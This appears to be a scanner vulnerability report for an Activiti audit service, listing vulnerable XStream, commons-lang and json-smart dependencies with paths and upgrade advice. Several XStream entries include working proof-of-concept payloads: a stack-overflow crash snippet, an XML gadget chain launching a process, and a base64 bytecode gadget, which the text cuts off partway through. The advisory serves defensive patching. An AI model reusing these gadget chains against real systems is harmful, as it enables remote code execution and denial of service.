Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshalling XML or any supported format.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.11 or higher.
References
high severity
- Vulnerable module: commons-lang:commons-lang
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8 › commons-lang:commons-lang@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8 › commons-lang:commons-lang@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8 › commons-lang:commons-lang@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › commons-configuration:commons-configuration@1.8 › commons-lang:commons-lang@2.6
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion via the ClassUtils.getClass function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.
Remediation
There is no fixed version for commons-lang:commons-lang.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the BinaryStreamDriver.
Workaround
This vulnerability can be mitigated by catching the StackOverflowError in the client code calling XStream.
PoC
Prepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:
final byte[] byteArray = new byte[36000];
for (int i = 0; i < byteArray.length / 4; i++) {
byteArray[i * 4] = 10;
byteArray[i * 4 + 1] = -127;
byteArray[i * 4 + 2] = 0;
byteArray[i * 4 + 3] = 0;
}
XStream xstream = new XStream(new BinaryStreamDriver());
xstream.fromXML(new ByteArrayInputStream(byteArray));
As soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.21 or higher.
References
high severity
- Vulnerable module: net.minidev:json-smart
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.data:spring-data-rest-core@5.0.2 › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-hateoas@4.0.1 › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.data:spring-data-rest-webmvc@5.0.2 › org.springframework.data:spring-data-rest-core@5.0.2 › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-hateoas@4.0.1 › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-data-rest@4.0.1 › org.springframework.data:spring-data-rest-webmvc@5.0.2 › org.springframework.data:spring-data-rest-core@5.0.2 › org.springframework.hateoas:spring-hateoas@3.0.2 › com.jayway.jsonpath:json-path@2.9.0 › net.minidev:json-smart@2.5.0
Overview
net.minidev:json-smart is a Java JSON parser.
Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can cause a stack exhaustion and subsequent service disruption by providing JSON input with an excessive number of nested {.
Note:
This issue exists because of an incomplete fix for CVE-2023-1370.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade net.minidev:json-smart to version 2.5.2 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.
This issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.
PoC
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='javax.imageio.spi.FilterIterator'>
<iter class='java.util.ArrayList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>1</expectedModCount>
<outer-class>
<java.lang.ProcessBuilder>
<command>
<string>calc</string>
</command>
</java.lang.ProcessBuilder>
</outer-class>
</iter>
<filter class='javax.imageio.ImageIO$ContainsFilter'>
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>start</name>
</filter>
<next/>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
Note: 1.4.14-jdk7is optimised for OpenJDK 7, release 1.4.14 are compatible with other JDK projects.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.14 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>
<outer-class>
<verbose>0</verbose>
<effort>0</effort>
<optDumpBands>false</optDumpBands>
<optDebugBands>false</optDebugBands>
<optVaryCodings>false</optVaryCodings>
<optBigStrings>false</optBigStrings>
<isReader>false</isReader>
<bandHeaderBytePos>0</bandHeaderBytePos>
<bandHeaderBytePos0>0</bandHeaderBytePos0>
<archiveOptions>0</archiveOptions>
<archiveSize0>0</archiveSize0>
<archiveSize1>0</archiveSize1>
<archiveNextCount>0</archiveNextCount>
<attrClassFileVersionMask>0</attrClassFileVersionMask>
<attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>
<bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>
